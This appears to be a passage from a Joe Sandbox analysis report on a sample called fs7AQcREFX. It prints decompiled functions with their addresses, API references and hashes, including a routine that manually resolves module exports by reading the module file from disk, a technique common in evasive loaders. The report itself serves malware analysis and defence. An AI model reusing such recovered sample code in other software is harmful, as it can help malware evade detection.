                                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					MessageBoxA( *(_t184 + 4), "Print operation failed", "MTPad", 0x10);
                                                                                                                                                                                                                                                                                          					 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}


































                                                                                                                                                                                                                                                                                          0x000f9113
                                                                                                                                                                                                                                                                                          0x000f9115
                                                                                                                                                                                                                                                                                          0x000f9120
                                                                                                                                                                                                                                                                                          0x000f912a
                                                                                                                                                                                                                                                                                          0x000f9131
                                                                                                                                                                                                                                                                                          0x000f9135
                                                                                                                                                                                                                                                                                          0x000f913b
                                                                                                                                                                                                                                                                                          0x000f9145
                                                                                                                                                                                                                                                                                          0x000f9182
                                                                                                                                                                                                                                                                                          0x000f9185
                                                                                                                                                                                                                                                                                          0x000f9188
                                                                                                                                                                                                                                                                                          0x000f918b
                                                                                                                                                                                                                                                                                          0x000f918e
                                                                                                                                                                                                                                                                                          0x000f9191
                                                                                                                                                                                                                                                                                          0x000f9194
                                                                                                                                                                                                                                                                                          0x000f919c
                                                                                                                                                                                                                                                                                          0x000f91a5
                                                                                                                                                                                                                                                                                          0x000f91ab
                                                                                                                                                                                                                                                                                          0x000f91b5
                                                                                                                                                                                                                                                                                          0x000f91ba
                                                                                                                                                                                                                                                                                          0x000f91c0
                                                                                                                                                                                                                                                                                          0x000f91c6
                                                                                                                                                                                                                                                                                          0x000f91d0
                                                                                                                                                                                                                                                                                          0x000f91da
                                                                                                                                                                                                                                                                                          0x000f91e1
                                                                                                                                                                                                                                                                                          0x000f91e7
                                                                                                                                                                                                                                                                                          0x000f91ea
                                                                                                                                                                                                                                                                                          0x000f91ec
                                                                                                                                                                                                                                                                                          0x000f9234
                                                                                                                                                                                                                                                                                          0x000f9234
                                                                                                                                                                                                                                                                                          0x000f9234
                                                                                                                                                                                                                                                                                          0x000f91ee
                                                                                                                                                                                                                                                                                          0x000f91ee
                                                                                                                                                                                                                                                                                          0x000f91f1
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f91f3
                                                                                                                                                                                                                                                                                          0x000f91f3
                                                                                                                                                                                                                                                                                          0x000f91fe
                                                                                                                                                                                                                                                                                          0x000f9203
                                                                                                                                                                                                                                                                                          0x000f9209
                                                                                                                                                                                                                                                                                          0x000f920c
                                                                                                                                                                                                                                                                                          0x000f920e
                                                                                                                                                                                                                                                                                          0x000f921d
                                                                                                                                                                                                                                                                                          0x000f9229
                                                                                                                                                                                                                                                                                          0x000f922f
                                                                                                                                                                                                                                                                                          0x000f922f
                                                                                                                                                                                                                                                                                          0x000f920e
                                                                                                                                                                                                                                                                                          0x000f91f1
                                                                                                                                                                                                                                                                                          0x000f923f
                                                                                                                                                                                                                                                                                          0x000f924a
                                                                                                                                                                                                                                                                                          0x000f9255
                                                                                                                                                                                                                                                                                          0x000f9262
                                                                                                                                                                                                                                                                                          0x000f9269
                                                                                                                                                                                                                                                                                          0x000f9276
                                                                                                                                                                                                                                                                                          0x000f927d
                                                                                                                                                                                                                                                                                          0x000f928c
                                                                                                                                                                                                                                                                                          0x000f9291
                                                                                                                                                                                                                                                                                          0x000f9294
                                                                                                                                                                                                                                                                                          0x000f929d
                                                                                                                                                                                                                                                                                          0x000f92a0
                                                                                                                                                                                                                                                                                          0x000f92a2
                                                                                                                                                                                                                                                                                          0x000f92ae
                                                                                                                                                                                                                                                                                          0x000f92b4
                                                                                                                                                                                                                                                                                          0x000f92b4
                                                                                                                                                                                                                                                                                          0x000f92ba
                                                                                                                                                                                                                                                                                          0x000f92c0
                                                                                                                                                                                                                                                                                          0x000f92c6
                                                                                                                                                                                                                                                                                          0x000f92c8
                                                                                                                                                                                                                                                                                          0x000f92cb
                                                                                                                                                                                                                                                                                          0x000f92d1
                                                                                                                                                                                                                                                                                          0x000f92d1
                                                                                                                                                                                                                                                                                          0x000f92e4
                                                                                                                                                                                                                                                                                          0x000f92e9
                                                                                                                                                                                                                                                                                          0x000f92eb
                                                                                                                                                                                                                                                                                          0x000f92f1
                                                                                                                                                                                                                                                                                          0x000f92f7
                                                                                                                                                                                                                                                                                          0x000f9300
                                                                                                                                                                                                                                                                                          0x000f9304
                                                                                                                                                                                                                                                                                          0x000f930d
                                                                                                                                                                                                                                                                                          0x000f9310
                                                                                                                                                                                                                                                                                          0x000f9311
                                                                                                                                                                                                                                                                                          0x000f9313
                                                                                                                                                                                                                                                                                          0x000f931d
                                                                                                                                                                                                                                                                                          0x000f931e
                                                                                                                                                                                                                                                                                          0x000f931e
                                                                                                                                                                                                                                                                                          0x000f931e
                                                                                                                                                                                                                                                                                          0x000f933c
                                                                                                                                                                                                                                                                                          0x000f9341
                                                                                                                                                                                                                                                                                          0x000f9348
                                                                                                                                                                                                                                                                                          0x000f934a
                                                                                                                                                                                                                                                                                          0x000f934a
                                                                                                                                                                                                                                                                                          0x000f9348
                                                                                                                                                                                                                                                                                          0x000f9361
                                                                                                                                                                                                                                                                                          0x000f936a
                                                                                                                                                                                                                                                                                          0x000f936c
                                                                                                                                                                                                                                                                                          0x000f9373
                                                                                                                                                                                                                                                                                          0x000f9376
                                                                                                                                                                                                                                                                                          0x000f9378
                                                                                                                                                                                                                                                                                          0x000f937b
                                                                                                                                                                                                                                                                                          0x000f937b
                                                                                                                                                                                                                                                                                          0x000f9380
                                                                                                                                                                                                                                                                                          0x000f9385
                                                                                                                                                                                                                                                                                          0x000f9393
                                                                                                                                                                                                                                                                                          0x000f9147
                                                                                                                                                                                                                                                                                          0x000f9157
                                                                                                                                                                                                                                                                                          0x000f9162
                                                                                                                                                                                                                                                                                          0x000f9170
                                                                                                                                                                                                                                                                                          0x000f9170

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Global$LockUnlock$ActiveAllocMessageWindow_memmove_memset
                                                                                                                                                                                                                                                                                          • String ID: MTPad$Print operation failed
                                                                                                                                                                                                                                                                                          • API String ID: 3143621014-2011953037
                                                                                                                                                                                                                                                                                          • Opcode ID: db18722e3da334b2c4452fe1ebf39822324b3a9c0f8d917e135327464abc46ee
                                                                                                                                                                                                                                                                                          • Instruction ID: 198ed76694d64ee49fdfe8955bbbe40260c0047f99a2c44aab2c80fe7b45ff8e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: db18722e3da334b2c4452fe1ebf39822324b3a9c0f8d917e135327464abc46ee
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C9815875E00208DFCB54CFA8D884AAAF7F8FF88300F10865AE9199B791D775E945CB50
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E040035E0(CHAR* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _v12;
                                                                                                                                                                                                                                                                                          				char _v532;
                                                                                                                                                                                                                                                                                          				void* _v536;
                                                                                                                                                                                                                                                                                          				long _v540;
                                                                                                                                                                                                                                                                                          				void* _v544;
                                                                                                                                                                                                                                                                                          				long _v548;
                                                                                                                                                                                                                                                                                          				CHAR* _v552;
                                                                                                                                                                                                                                                                                          				void* _v556;
                                                                                                                                                                                                                                                                                          				int _v560;
                                                                                                                                                                                                                                                                                          				char _v820;
                                                                                                                                                                                                                                                                                          				CHAR* _v824;
                                                                                                                                                                                                                                                                                          				char _v1084;
                                                                                                                                                                                                                                                                                          				signed char _v1085;
                                                                                                                                                                                                                                                                                          				long _v1092;
                                                                                                                                                                                                                                                                                          				intOrPtr _v1096;
                                                                                                                                                                                                                                                                                          				long _t124;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				_v12 = GetModuleHandleA(_a4);
                                                                                                                                                                                                                                                                                          				if(_v12 != 0) {
                                                                                                                                                                                                                                                                                          					E04002E50( &_v532,  &_v532, 0, 0x208);
                                                                                                                                                                                                                                                                                          					if(GetModuleFileNameA(_v12,  &_v532, 0x207) > 0) {
                                                                                                                                                                                                                                                                                          						_v536 = CreateFileA( &_v532, 0x80000000, 7, 0, 3, 0, 0);
                                                                                                                                                                                                                                                                                          						if(_v536 != 0xffffffff) {
                                                                                                                                                                                                                                                                                          							_v540 = GetFileSize(_v536, 0);
                                                                                                                                                                                                                                                                                          							if(_v540 > 0) {
                                                                                                                                                                                                                                                                                          								_v544 = VirtualAlloc(0, _v540, 0x3000, 4);
                                                                                                                                                                                                                                                                                          								_t155 = _v544;
                                                                                                                                                                                                                                                                                          								if(_v544 != 0) {
                                                                                                                                                                                                                                                                                          									_v548 = 0;
                                                                                                                                                                                                                                                                                          									ReadFile(_v536, _v544, _v540,  &_v548, 0);
                                                                                                                                                                                                                                                                                          									_v556 = E04003370(_v536, _t155, _v544, _v540);
                                                                                                                                                                                                                                                                                          									_v552 = E04003580(_a8, _v556, _a8);
                                                                                                                                                                                                                                                                                          									_v560 = lstrlenA(_v552);
                                                                                                                                                                                                                                                                                          									if(_v560 > 2 && _v560 < 0x100) {
                                                                                                                                                                                                                                                                                          										_v824 = _v552;
                                                                                                                                                                                                                                                                                          										_v1085 = 0;
                                                                                                                                                                                                                                                                                          										E04002E50(_v552,  &_v820, 0, 0x100);
                                                                                                                                                                                                                                                                                          										E04002E50(_v552,  &_v1084, 0, 0x100);
                                                                                                                                                                                                                                                                                          										_v1092 = 0;
                                                                                                                                                                                                                                                                                          										while(_v1092 < _v560) {
                                                                                                                                                                                                                                                                                          											if(_v824[_v1092] < 0x20 || _v824[_v1092] > 0x7e) {
                                                                                                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                                                                                                          												if(_v824[_v1092] != 0x2e) {
                                                                                                                                                                                                                                                                                          													_t124 = _v1092 + 1;
                                                                                                                                                                                                                                                                                          													__eflags = _t124;
                                                                                                                                                                                                                                                                                          													_v1092 = _t124;
                                                                                                                                                                                                                                                                                          													continue;
                                                                                                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                                                                                                          													lstrcpynA( &_v820, _v824, _v1092 + 1);
                                                                                                                                                                                                                                                                                          													lstrcatA( &_v820, ".dll");
                                                                                                                                                                                                                                                                                          													lstrcpyA( &_v1084,  &(_v824[_v1092 + 1]));
                                                                                                                                                                                                                                                                                          													_v1085 = 1;
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          											break;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										if((_v1085 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          											_v8 = E040035E0( &_v820,  &_v1084);
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									if(_v8 == 0 && _v552 != 0) {
                                                                                                                                                                                                                                                                                          										_v1096 = _v552 - _v556;
                                                                                                                                                                                                                                                                                          										_v8 = _v12 + _v1096;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									VirtualFree(_v556, 0, 0x8000);
                                                                                                                                                                                                                                                                                          									VirtualFree(_v544, 0, 0x8000);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							CloseHandle(_v536);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                                          			}




















                                                                                                                                                                                                                                                                                          0x040035e9
                                                                                                                                                                                                                                                                                          0x040035fa
                                                                                                                                                                                                                                                                                          0x04003601
                                                                                                                                                                                                                                                                                          0x04003615
                                                                                                                                                                                                                                                                                          0x04003635
                                                                                                                                                                                                                                                                                          0x04003657
                                                                                                                                                                                                                                                                                          0x04003664
                                                                                                                                                                                                                                                                                          0x04003679
                                                                                                                                                                                                                                                                                          0x04003686
                                                                                                                                                                                                                                                                                          0x040036a2
                                                                                                                                                                                                                                                                                          0x040036a8
                                                                                                                                                                                                                                                                                          0x040036af
                                                                                                                                                                                                                                                                                          0x040036b5
                                                                                                                                                                                                                                                                                          0x040036dd
                                                                                                                                                                                                                                                                                          0x040036f9
                                                                                                                                                                                                                                                                                          0x04003712
                                                                                                                                                                                                                                                                                          0x04003725
                                                                                                                                                                                                                                                                                          0x04003732
                                                                                                                                                                                                                                                                                          0x0400374e
                                                                                                                                                                                                                                                                                          0x04003754
                                                                                                                                                                                                                                                                                          0x04003769
                                                                                                                                                                                                                                                                                          0x0400377f
                                                                                                                                                                                                                                                                                          0x04003787
                                                                                                                                                                                                                                                                                          0x040037a2
                                                                                                                                                                                                                                                                                          0x040037c6
                                                                                                                                                                                                                                                                                          0x040037e0
                                                                                                                                                                                                                                                                                          0x040037f2
                                                                                                                                                                                                                                                                                          0x04003799
                                                                                                                                                                                                                                                                                          0x04003799
                                                                                                                                                                                                                                                                                          0x0400379c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040037f4
                                                                                                                                                                                                                                                                                          0x0400380c
                                                                                                                                                                                                                                                                                          0x0400381e
                                                                                                                                                                                                                                                                                          0x0400383c
                                                                                                                                                                                                                                                                                          0x04003842
                                                                                                                                                                                                                                                                                          0x04003842
                                                                                                                                                                                                                                                                                          0x040037f2
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040037c6
                                                                                                                                                                                                                                                                                          0x0400385d
                                                                                                                                                                                                                                                                                          0x04003875
                                                                                                                                                                                                                                                                                          0x04003875
                                                                                                                                                                                                                                                                                          0x0400385d
                                                                                                                                                                                                                                                                                          0x0400387c
                                                                                                                                                                                                                                                                                          0x04003893
                                                                                                                                                                                                                                                                                          0x040038a2
                                                                                                                                                                                                                                                                                          0x040038a2
                                                                                                                                                                                                                                                                                          0x040038b3
                                                                                                                                                                                                                                                                                          0x040038c7
                                                                                                                                                                                                                                                                                          0x040038c7
                                                                                                                                                                                                                                                                                          0x040036af
                                                                                                                                                                                                                                                                                          0x040038d4
                                                                                                                                                                                                                                                                                          0x040038d4
                                                                                                                                                                                                                                                                                          0x04003664
                                                                                                                                                                                                                                                                                          0x04003635
                                                                                                                                                                                                                                                                                          0x040038e0

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?), ref: 040035F4
                                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000207), ref: 0400362D
                                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 04003651
                                                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 04003673
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0400369C
                                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 040036DD
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 0400371F
                                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,-00000001), ref: 0400380C
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,.dll), ref: 0400381E
                                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,?), ref: 0400383C
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 040038B3
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040038C7
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 040038D4
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: File$Virtual$FreeHandleModule$AllocCloseCreateNameReadSizelstrcatlstrcpylstrcpynlstrlen
                                                                                                                                                                                                                                                                                          • String ID: .dll
                                                                                                                                                                                                                                                                                          • API String ID: 4040249471-2738580789
                                                                                                                                                                                                                                                                                          • Opcode ID: 200bb4075ff646b41afc5d2470261fe04451761bc05d74db12b83caaac164272
                                                                                                                                                                                                                                                                                          • Instruction ID: c2c5132629a25a5507b869beac9dac576087064a04ada7ddd23a517ed68c32e0
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 200bb4075ff646b41afc5d2470261fe04451761bc05d74db12b83caaac164272
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC814EB5940228ABEB35DF50DC89BDDB7B5AB48304F1081D8EA09B7280D674AFC4CF55
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 65%
                                                                                                                                                                                                                                                                                          			E000F4C70(struct HWND__** __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                                                                                                          				int _v24;
                                                                                                                                                                                                                                                                                          				long _v28;
                                                                                                                                                                                                                                                                                          				struct HWND__** _v32;
                                                                                                                                                                                                                                                                                          				long _v36;
                                                                                                                                                                                                                                                                                          				struct tagRECT _v64;
                                                                                                                                                                                                                                                                                          				struct tagRECT _v80;
                                                                                                                                                                                                                                                                                          				struct HWND__** _v84;
                                                                                                                                                                                                                                                                                          				long _v88;
                                                                                                                                                                                                                                                                                          				struct tagRECT _v104;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t48;
                                                                                                                                                                                                                                                                                          				struct HMONITOR__* _t53;
                                                                                                                                                                                                                                                                                          				intOrPtr _t72;
                                                                                                                                                                                                                                                                                          				int _t73;
                                                                                                                                                                                                                                                                                          				intOrPtr _t74;
                                                                                                                                                                                                                                                                                          				int _t75;
                                                                                                                                                                                                                                                                                          				int _t77;
                                                                                                                                                                                                                                                                                          				long _t84;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t86;
                                                                                                                                                                                                                                                                                          				signed int _t88;
                                                                                                                                                                                                                                                                                          				void* _t91;
                                                                                                                                                                                                                                                                                          				void* _t92;
                                                                                                                                                                                                                                                                                          				void* _t93;
                                                                                                                                                                                                                                                                                          				int _t99;
                                                                                                                                                                                                                                                                                          				struct HWND__** _t106;
                                                                                                                                                                                                                                                                                          				long _t110;
                                                                                                                                                                                                                                                                                          				long _t113;
                                                                                                                                                                                                                                                                                          				struct HWND__** _t116;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t117;
                                                                                                                                                                                                                                                                                          				int _t120;
                                                                                                                                                                                                                                                                                          				void* _t121;
                                                                                                                                                                                                                                                                                          				void* _t122;
                                                                                                                                                                                                                                                                                          				int _t123;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t125;
                                                                                                                                                                                                                                                                                          				void* _t127;
                                                                                                                                                                                                                                                                                          				void* _t128;
                                                                                                                                                                                                                                                                                          				void* _t129;
                                                                                                                                                                                                                                                                                          				signed int _t130;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t108 = __edx;
                                                                                                                                                                                                                                                                                          				_t132 = (_t130 & 0xfffffff8) - 0x64;
                                                                                                                                                                                                                                                                                          				_t48 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v8 = _t48 ^ (_t130 & 0xfffffff8) - 0x00000064;
                                                                                                                                                                                                                                                                                          				_t116 = __ecx;
                                                                                                                                                                                                                                                                                          				_v104.top = __ecx;
                                                                                                                                                                                                                                                                                          				_t125 = __edx;
                                                                                                                                                                                                                                                                                          				_t88 = GetWindowLongA( *__ecx, 0xfffffff0);
                                                                                                                                                                                                                                                                                          				if(_t125 == 0) {
                                                                                                                                                                                                                                                                                          					if((_t88 & 0x40000000) == 0) {
                                                                                                                                                                                                                                                                                          						_t108 =  *_t116;
                                                                                                                                                                                                                                                                                          						_t86 = GetWindow( *_t116, 4);
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t86 = GetParent( *_t116);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t125 = _t86;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t53 = GetWindowRect( *_t116,  &_v64);
                                                                                                                                                                                                                                                                                          				if((_t88 & 0x40000000) != 0) {
                                                                                                                                                                                                                                                                                          					_t117 = GetParent( *_t116);
                                                                                                                                                                                                                                                                                          					GetClientRect(_t117,  &_v80);
                                                                                                                                                                                                                                                                                          					GetClientRect(_t125,  &(_v104.right));
                                                                                                                                                                                                                                                                                          					MapWindowPoints(_t125, _t117,  &(_v104.right), 2);
                                                                                                                                                                                                                                                                                          					goto L19;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					if(_t125 == 0) {
                                                                                                                                                                                                                                                                                          						L10:
                                                                                                                                                                                                                                                                                          						_t108 =  *_t116;
                                                                                                                                                                                                                                                                                          						_push(2);
                                                                                                                                                                                                                                                                                          						_push( *_t116);
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t53 = GetWindowLongA(_t125, 0xfffffff0);
                                                                                                                                                                                                                                                                                          						if((_t53 & 0x10000000) == 0 || (_t53 & 0x20000000) != 0) {
                                                                                                                                                                                                                                                                                          							_t125 = 0;
                                                                                                                                                                                                                                                                                          							goto L10;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_push(2);
                                                                                                                                                                                                                                                                                          							_push(_t125);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					__imp__MonitorFromWindow();
                                                                                                                                                                                                                                                                                          					if(_t53 != 0) {
                                                                                                                                                                                                                                                                                          						_v64.right.cbSize = 0x28;
                                                                                                                                                                                                                                                                                          						if(GetMonitorInfoA(_t53,  &(_v64.right)) == 0) {
                                                                                                                                                                                                                                                                                          							goto L12;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t84 = _v36;
                                                                                                                                                                                                                                                                                          							_t106 = _v32;
                                                                                                                                                                                                                                                                                          							_t113 = _v28;
                                                                                                                                                                                                                                                                                          							_t123 = _v24;
                                                                                                                                                                                                                                                                                          							_v88 = _t84;
                                                                                                                                                                                                                                                                                          							_v84 = _t106;
                                                                                                                                                                                                                                                                                          							_v80.left = _t113;
                                                                                                                                                                                                                                                                                          							_v80.top = _t123;
                                                                                                                                                                                                                                                                                          							if(_t125 != 0) {
                                                                                                                                                                                                                                                                                          								GetWindowRect(_t125,  &_v104);
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_v104.left = _t84;
                                                                                                                                                                                                                                                                                          								_v104.top = _t106;
                                                                                                                                                                                                                                                                                          								_v104.right.x = _t113;
                                                                                                                                                                                                                                                                                          								_v104.bottom = _t123;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							L19:
                                                                                                                                                                                                                                                                                          							_t110 = _v104.right.x;
                                                                                                                                                                                                                                                                                          							_t127 = _v64.right.cbSize - _v64.left;
                                                                                                                                                                                                                                                                                          							asm("cdq");
                                                                                                                                                                                                                                                                                          							_t91 = _v64.bottom - _v64.top;
                                                                                                                                                                                                                                                                                          							asm("cdq");
                                                                                                                                                                                                                                                                                          							_t99 = (_v88 + _t110 - _t110 >> 1) - (_t127 - _t110 >> 1);
                                                                                                                                                                                                                                                                                          							asm("cdq");
                                                                                                                                                                                                                                                                                          							asm("cdq");
                                                                                                                                                                                                                                                                                          							_t120 = (_v104.bottom + _v84 - _t110 >> 1) - (_t91 - _t110 >> 1);
                                                                                                                                                                                                                                                                                          							_t72 = _v80.right;
                                                                                                                                                                                                                                                                                          							if(_t99 + _t127 > _t72) {
                                                                                                                                                                                                                                                                                          								_t99 = _t72 - _t127;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t73 = _v80.left;
                                                                                                                                                                                                                                                                                          							if(_t99 < _t73) {
                                                                                                                                                                                                                                                                                          								_t99 = _t73;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t74 = _v80.bottom;
                                                                                                                                                                                                                                                                                          							_t112 = _t120 + _t91;
                                                                                                                                                                                                                                                                                          							if(_t120 + _t91 > _t74) {
                                                                                                                                                                                                                                                                                          								_t120 = _t74 - _t91;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t75 = _v80.top;
                                                                                                                                                                                                                                                                                          							if(_t120 < _t75) {
                                                                                                                                                                                                                                                                                          								_t120 = _t75;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t77 = SetWindowPos( *(_v104.top), 0, _t99, _t120, 0xffffffff, 0xffffffff, 0x15);
                                                                                                                                                                                                                                                                                          							_pop(_t121);
                                                                                                                                                                                                                                                                                          							_pop(_t128);
                                                                                                                                                                                                                                                                                          							_pop(_t92);
                                                                                                                                                                                                                                                                                          							return E001059E6(_t77, _t92, _v8 ^ _t132, _t112, _t121, _t128);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						L12:
                                                                                                                                                                                                                                                                                          						_pop(_t122);
                                                                                                                                                                                                                                                                                          						_pop(_t129);
                                                                                                                                                                                                                                                                                          						_pop(_t93);
                                                                                                                                                                                                                                                                                          						return E001059E6(0, _t93, _v16 ^ _t132, _t108, _t122, _t129);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}













































                                                                                                                                                                                                                                                                                          0x000f4c70
                                                                                                                                                                                                                                                                                          0x000f4c76
                                                                                                                                                                                                                                                                                          0x000f4c79
                                                                                                                                                                                                                                                                                          0x000f4c80
                                                                                                                                                                                                                                                                                          0x000f4c87
                                                                                                                                                                                                                                                                                          0x000f4c8e
                                                                                                                                                                                                                                                                                          0x000f4c92
                                                                                                                                                                                                                                                                                          0x000f4c9a
                                                                                                                                                                                                                                                                                          0x000f4c9e
                                                                                                                                                                                                                                                                                          0x000f4ca6
                                                                                                                                                                                                                                                                                          0x000f4cb3
                                                                                                                                                                                                                                                                                          0x000f4cb8
                                                                                                                                                                                                                                                                                          0x000f4ca8
                                                                                                                                                                                                                                                                                          0x000f4cab
                                                                                                                                                                                                                                                                                          0x000f4cab
                                                                                                                                                                                                                                                                                          0x000f4cbe
                                                                                                                                                                                                                                                                                          0x000f4cbe
                                                                                                                                                                                                                                                                                          0x000f4cc8
                                                                                                                                                                                                                                                                                          0x000f4cd4
                                                                                                                                                                                                                                                                                          0x000f4d8e
                                                                                                                                                                                                                                                                                          0x000f4d92
                                                                                                                                                                                                                                                                                          0x000f4d9a
                                                                                                                                                                                                                                                                                          0x000f4da5
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f4cda
                                                                                                                                                                                                                                                                                          0x000f4cdc
                                                                                                                                                                                                                                                                                          0x000f4cf7
